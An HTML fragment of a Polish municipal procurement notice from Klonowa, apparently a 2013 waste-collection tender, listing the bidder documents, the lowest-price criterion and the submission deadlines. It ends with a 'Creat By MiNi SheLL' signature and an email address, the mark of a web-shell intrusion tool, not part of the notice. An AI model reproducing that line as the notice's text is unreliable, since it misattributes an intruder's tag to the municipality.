<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę. Wzór umowy - podpisany przez wykonawcę. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. Oświadczenie Wykonawcy o spełnieniu warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych (zgodnie z art. 44 ustawy Pzp). Wpis do rejestru działalności regulowanej. Aktualne zezwolenie na zbieranie, transport, odzysk bądź unieszkodliwienie odpadów komunalnych. Dokumenty wymagane w przypadku składania oferty wspólnej: oferta winna być podpisana przez ustanowionego pełnomocnika do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Stosowne pełnomocnictwo/upoważnienie wymaga podpisu prawnie upoważnionych przedstawicieli każdego z wykonawców występujących wspólnie - należy załączyć do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy dotyczących wynagrodzenia (ceny) za wykonanie usługi w przypadku zmiany ustawowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.klonowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Klonowej, ul. Ks. Józefa Dalaka 2, 98-273 Klonowa, pokój nr 10, w godz. od 7.30 do 15.30 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 10:00, miejsce: Urząd Gminy w Klonowej
ul. Ks. Józefa Dalaka 2
98-273 Klonowa
Pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.06.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com